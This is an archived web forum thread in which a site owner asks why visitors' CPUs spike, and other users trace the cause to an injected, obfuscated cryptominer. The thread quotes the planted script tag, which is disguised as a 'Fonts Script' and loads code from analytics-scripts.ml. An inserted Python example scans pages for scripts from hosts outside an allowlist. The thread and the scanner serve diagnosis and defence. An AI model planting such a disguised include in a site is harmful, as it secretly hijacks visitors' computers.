vb.org Archive

MasturB 03-21-2018 06:38 AM

Forum users complaining bitmining malware is running.
 
Hello,

A few of my users have reported that my website currently has bitmining malware running whenever they visit it.

Their CPU activity monitors are skyrocketing when they enter my site, and then it drops once they close it in the browser. Any suggestions?

Dave 03-21-2018 01:37 PM

View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

MasturB 03-21-2018 05:36 PM

Quote:

Originally Posted by Dave (Post 2593647)
View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

Thanks Dave.

It's chopcountry.com

final kaoss 03-21-2018 05:57 PM

I notice that on your site, uBlock is blocking a resource from:
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

Also your site is marked as infected.
https://sitecheck.sucuri.net/results...rums/forum.php

MasturB 03-21-2018 06:03 PM

Quote:

Originally Posted by final kaoss (Post 2593652)
I notice that on your site, uBlock is blocking a resource from:
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

I just got off the phone with GoDaddy Security Tech. He checked the SQL for GoDaddy Hosting, and oddly enough he said there was a Stats Collector in the script/software that was hoarding all the CPU resources.

He obviously wasn't allowed to go in Admin and look, but he seemed pretty confident it was a Stats thing that was using up all the CPU.

So the stats thing might be the analytics scripts you've found.

Dave 03-21-2018 06:36 PM

At the bottom of your page you have:
HTML Code:

<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->

which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
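
The check described in this thread (reading the page source and looking for script includes that do not belong) can be automated. The following is an added example, not part of the original thread: it lists every `<script src>` whose host is outside an allowlist. The names `forum.example` and `cdn.example`, the function names and the sample page are assumptions constructed around the tag quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def unexpected_script_hosts(html, page_url, allowed_hosts):
    """Return (host, url) for each script loaded from a host outside the allowlist.
    Relative and protocol-relative src values are resolved against page_url first.
    """
    allowed = {h.lower() for h in allowed_hosts}
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urljoin(page_url, src)
        host = (urlparse(url).hostname or "").lower()
        # Accept an allowed host or a true subdomain of it (not a lookalike suffix).
        if not any(host == a or host.endswith("." + a) for a in allowed):
            findings.append((host, url))
    return findings


# Constructed sample page: two ordinary includes plus the tag quoted in the thread.
SAMPLE_HTML = """
<script type="text/javascript" src="js/site.js"></script>
<script src="//cdn.example/lib/jquery.min.js"></script>
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
"""

if __name__ == "__main__":
    allow = ["forum.example", "cdn.example"]  # assumed allowlist for this sample
    for host, url in unexpected_script_hosts(SAMPLE_HTML, "http://forum.example/forum.php", allow):
        print(f"unexpected script host: {host}  ({url})")
```

Any host it reports is the string to search for in the forum's templates and plugins.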

MasturB 03-21-2018 06:39 PM

Quote:

Originally Posted by Dave (Post 2593654)
At the bottom of your page you have:
HTML Code:

<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->

which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.

How do I remove it?

Do I go through Admin panel? Keep in mind I'm practically a novice at this. When I bought the license and hosting in 2013, I was doing my best to learn on the fly and play around with stuff through trial and error to learn. But since the website has been running smooth with no issues for the last 5 years there was no reason for me to stay sharp on all of this.

